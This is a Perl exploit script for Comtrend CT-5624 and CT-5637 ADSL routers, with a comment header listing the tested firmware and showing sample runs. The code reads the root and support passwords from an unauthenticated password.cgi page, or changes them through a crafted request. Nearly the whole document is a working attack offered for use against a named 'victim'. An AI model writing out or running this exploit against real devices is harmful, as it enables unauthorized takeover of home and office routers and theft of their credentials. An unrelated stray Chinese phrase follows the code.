#!/usr/bin/perl # #[+] Comtrend Router CT-5624 Remote Root/Support Password Disclosure/Change Exploit # #Author: Todor Donev #Email: todor.donev@@gmail #Type: Hardware #Vuln Type: Remote # #Tested: #Board ID: CT-5624 #Software: A011-306TSR-C01_R03 #Bootloader: 1.0.37-0.7-3 #ADSL: A2pB022c3.d20e # #Board ID: CT-5637 #Software: A111-312BTC-C01_R12 #Bootloader: 1.0.37-12.1-1 #ADSL: A2pB023k.d20k_rc2 # ##### #CT-5624 ADSL2+ Ethernet Router #The CT-5624 series ADSL2+ compact and high performance Ethernet router #provides four 10/100 Ethernet Interfaces, and one ADSL line interface #to access the Internet, incorporating LAN or Video on Demand over one #ordinary telephone line, at speeds of up to 24 Mbps. It also has full #routing capabilities to segment/route IP protocol, and supports advanced #security functions. ##### # #playground$ perl comtrend.pl -c 192.168.1.1:80 #[+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit #[!] Target: 192.168.1.1:80 #[o] New root password: root31337 #[o] New support password: sup31337 #[*] Successfully !! ## #playground$ perl comtrend.pl -d 192.168.1.1:80 #[+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit #[!] Target: 192.168.1.1:80 #[o] root: root31337 #[o] support: sup31337 ## #playground$ perl comtrend.pl #[+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit #[!] usg: perl comtrend.pl [-c or -d] <victim> #[!]-d: Disclosure Root/Support password #[!]-c: Change Root/Support password # ##### #Thanks to Tsvetelina Emirska #for the help and support which gives me =) ##### use LWP::Simple; print "[+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit\n"; if (@ARGV == 0) {&usg;} while (@ARGV > 0) { $type = shift(@ARGV); $t = shift(@ARGV); if ($type eq "-d") { my $r = get("http://$t/password.cgi") or die("suck!"); print "[!] Target: $t\n"; if ($r =~ m/pwdAdmin = '(.*)';/g) { $result .= "[o] root: $1\n"; } if ($r =~ m/pwdSupport = '(.*)';/g) { $result .= "[o] support: $1\n"; print $result; }}} if ($type eq "-c") { print "[!] Target: $t\n"; print "[o] New root password: "; my $rootpass=<STDIN>; chomp($rootpass); print "[o] New support password: "; my $suppass=<STDIN>; chomp($suppass); my $r = get("http://$t/password.cgi?sysPassword=$rootpass&sptPassword=$suppass") or die("suck!"); if ($r =~ m/pwdAdmin = '$rootpass';/g) { print "[*] Successfully !!\n"; }} sub usg(){ print "[!] usg: perl comtrend.pl [-c or -d] <victim>\n"; print "[!]-d: Disclosure Root/Support password\n"; print "[!]-c: Change Root/Support password\n"; exit; }
体验盒子
